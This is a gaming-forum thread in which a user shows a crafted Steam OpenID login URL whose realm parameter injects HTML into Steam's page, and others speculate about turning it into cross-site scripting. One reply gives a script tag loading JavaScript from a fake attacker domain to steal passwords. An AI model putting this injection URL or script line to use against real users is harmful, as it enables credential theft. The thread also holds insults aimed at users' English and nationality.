CS.RIN.RU - Steam Underground Community

Just playing with the steam api and url's using a bit of my own html knowledge and managed to make there webpage do some intreasting tricks.

Exploited scrolling url

https://steamcommunity.com/openid/login?openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.return_to=http%3A%2F%2FC0nw0nk%2Fconvert.php&openid.mode=checkid_setup&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.trust_root=http%3A%2F%2FC0nw0nk&openid.realm=http%3A%2F%2F%3Cmarquee%3EC0nw0nk%20was%20here%20%3Cp%3Ewww.steam-hacks.com

_________________

I can't seem to find any serious vulnerability. Looks harmless.

_________________
I'm convinced that the only thing that kept me going was that I loved what I did.

I extreme this forum.

not rly .... it could be a potential XSS attack and can steal password if you can load JS in the page

You mean like this

<script type="text/javascript" src="fakesteamdomain.com/iframe.js"></script>

And the contents of the iframe.js file would be something allong the lines of.

_________________

yaeh you are rght i hackered an xxs injecxtion and stole unieted staets nuclaer lunch codes

_________________
I'm convinced that the only thing that kept me going was that I loved what I did.

I extreme this forum.

Best English typing I've ever seen here.However it's still better than the everyday n00b typing.

_________________
Click here before your first post!

Handy links

• Use JDownloader to automatically download stuff from Rapidshare and other file hosts. | (NOTE:Requires Java Runtime)
• My uploaded stuff on mediafire.com

Random quotes

hegyak wrote:

We evolved from smart users with dumb terminals to dumb users with smart terminals.

^ This man speaks the truth.

Random user don't let it be you wrote:

Sorry for my bad English

Nearly all of us don't have English as a native language,so we can't bother you for that!
If you really doubt your English,go here and ask in your OWN language!

Random user wrote:

What's teh password p|0X?

99% of the stuff here has the password cs.rin.ru

I dont blame your english being so shit, After all you are from turkey you have no one to blame but yourself.

(Perhaps your goverment)

_________________

goverment

and his English was bad?

_________________
no diggity

Yup

_________________

oh ya,hiz enlish wasn dat bad nao u grama nazy

_________________
Click here before your first post!

Handy links

• Use JDownloader to automatically download stuff from Rapidshare and other file hosts. | (NOTE:Requires Java Runtime)
• My uploaded stuff on mediafire.com

Random quotes

hegyak wrote:

We evolved from smart users with dumb terminals to dumb users with smart terminals.

^ This man speaks the truth.

Random user don't let it be you wrote:

Sorry for my bad English

Nearly all of us don't have English as a native language,so we can't bother you for that!
If you really doubt your English,go here and ask in your OWN language!

Random user wrote:

What's teh password p|0X?

99% of the stuff here has the password cs.rin.ru

M3h i d0nt h4v3 t0 tak3 dis k1nda bu11$h!t scr3w y0u guy's 1m g01ng h0m3.

//EDIT : never mind i am home.

_________________

1337 d035n'7 c0un7 M07H4F4k4

_________________
Click here before your first post!

Handy links

• Use JDownloader to automatically download stuff from Rapidshare and other file hosts. | (NOTE:Requires Java Runtime)
• My uploaded stuff on mediafire.com

Random quotes

hegyak wrote:

We evolved from smart users with dumb terminals to dumb users with smart terminals.

^ This man speaks the truth.

Random user don't let it be you wrote:

Sorry for my bad English

Nearly all of us don't have English as a native language,so we can't bother you for that!
If you really doubt your English,go here and ask in your OWN language!

Random user wrote:

What's teh password p|0X?

99% of the stuff here has the password cs.rin.ru

I declare h4x!!!

_________________